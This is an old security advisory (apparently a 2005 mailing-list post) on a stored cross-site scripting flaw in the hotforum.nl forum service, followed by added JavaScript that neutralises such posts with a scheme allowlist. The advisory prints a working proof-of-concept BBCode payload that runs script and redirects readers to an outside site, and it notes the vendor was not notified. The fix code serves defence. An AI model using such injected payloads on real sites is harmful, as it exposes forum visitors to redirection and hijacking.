...::: hotforum.nl XSS exploit :::...
From: Rebyte Security (rebyte walla.com)
Date: Sat Mar 12 2005 - 17:59:16 CST
hotforum.nl XSS exploit
---------------------------
* 13 March 2005
* Discovered by Qon^Rebyte
..:: STATUS ::..
______________________________________________________________________
hotforum.nl has not yet been notified about this exploit
..:: VULNERABLE ::..
______________________________________________________________________
All hotforums, because it's an online service.
Once the service is patched all hotforums will be immune.
..:: EXPLOIT ::..
______________________________________________________________________
Risk: Low/Medium
Type: Input Validation Error
What: Input JS code
Proof of Concept
----------------
Post this:
**********************************************************************
[img]javascript:alert('hotforum.nl xss exploit - by Qon^Rebyte');
location.replace('http://dhost.info/recall/rebyte/');[/img]
**********************************************************************
This will alert the following message:
"hotforum.nl xss exploit - by Qon^Rebyte"
and redirect to another site:
"http://dhost.info/recall/rebyte/"
..:: CREDITS ::..
______________________________________________________________________
This bug was discovered in approx. 3 minutes time by Qon^Rebyte.
Because it's just a very plain XSS bug :)
Greetings fly out 2
---------------------
* Rebyte Security : because it rox :)
* Mr.Manson : Rebyte co-admin
* Bugtraq : for doing a great job
*** Qon ^ Rebyte ***
-- http://dhost.info/recall/rebyte/ --
---------- rebyte walla.com ----------
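
The proof of concept above works because a javascript: URL is accepted as the content of an [img] tag. The following is an added example, not hotforum.nl's code and not part of the original advisory: a server-side renderer that only emits an image for absolute http/https URLs and leaves everything else as inert escaped text. The function names are hypothetical, and it assumes the forum only needs absolute http/https images.

```javascript
// Added example: allowlist-based rendering of BBCode [img] tags (Node.js).
// Function names are hypothetical; POC is the post quoted in the advisory.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

const POC = "[img]javascript:alert('hotforum.nl xss exploit - by Qon^Rebyte');" +
            "location.replace('http://dhost.info/recall/rebyte/');[/img]";

// Escape text for HTML text nodes and double-quoted attribute values.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Return the normalized URL if it is acceptable as an image source, else null.
function safeImageUrl(raw) {
  let url;
  try {
    // The WHATWG URL parser resolves the scheme the way a browser would,
    // so the check sees the same scheme the browser will act on.
    url = new URL(raw.trim());
  } catch (e) {
    return null; // relative or malformed input is rejected
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Render a post: accepted [img] tags become <img>, everything else is escaped.
function renderImgTags(post) {
  const re = /\[img\]([\s\S]*?)\[\/img\]/gi;
  let out = '', last = 0, m;
  while ((m = re.exec(post)) !== null) {
    out += escapeHtml(post.slice(last, m.index));
    const href = safeImageUrl(m[1]);
    out += href
      ? `<img src="${escapeHtml(href)}" alt="">` // re-serialized, escaped URL
      : escapeHtml(m[0]);                         // rejected tag shown as text
    last = re.lastIndex;
  }
  return out + escapeHtml(post.slice(last));
}

console.log(renderImgTags(POC));
console.log(renderImgTags('[img]https://example.com/cat.png[/img]'));
```

The check is an allowlist of schemes rather than a search for the string "javascript", so any scheme other than http and https is refused without having to be listed.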